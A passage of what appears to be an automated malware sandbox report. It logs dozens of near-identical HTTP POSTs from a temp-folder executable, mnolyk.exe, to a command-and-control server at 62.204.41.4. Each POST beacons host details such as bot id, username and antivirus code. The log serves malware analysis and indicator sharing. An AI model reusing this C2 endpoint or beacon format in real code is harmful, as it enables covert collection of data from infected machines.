                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:30.170248985 CET255INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    540192.168.2.35024362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:55.883469105 CET739OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:55.948122025 CET740INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    541192.168.2.35024462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:56.124936104 CET740OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:56.189805984 CET741INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    542192.168.2.35024562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:56.364181042 CET741OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:56.427768946 CET742INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    543192.168.2.35024662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:56.596900940 CET742OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:56.662391901 CET743INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    544192.168.2.35024762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:56.859618902 CET743OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:56.923338890 CET744INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    545192.168.2.35024862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:57.096615076 CET744OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:57.161145926 CET745INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    546192.168.2.35024962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:57.332963943 CET745OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:57.396867037 CET746INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    547192.168.2.35025062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:57.566354036 CET746OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:57.658190966 CET747INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    548192.168.2.35025162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:57.847161055 CET747OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:57.927674055 CET748INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    549192.168.2.35025262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:58.095925093 CET748OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:58.160579920 CET749INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    55192.168.2.34975762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:30.341809034 CET256OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:30.403728008 CET256INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    550192.168.2.35025362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:58.330621958 CET749OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:58.394375086 CET750INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    551192.168.2.35025462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:58.565095901 CET750OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:58.629164934 CET751INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    552192.168.2.35025562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:58.840938091 CET751OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:58.905013084 CET752INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    553192.168.2.35025662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:59.079103947 CET752OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:59.144504070 CET753INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    554192.168.2.35025762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:59.313801050 CET753OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:59.379992962 CET754INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    555192.168.2.35025862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:59.548026085 CET754OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:59.612236977 CET755INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    556192.168.2.35025962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:59.785012007 CET755OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:59.849739075 CET756INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    557192.168.2.35026062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:34:00.035520077 CET756OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:34:00.102188110 CET757INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:34:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    558192.168.2.35026162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
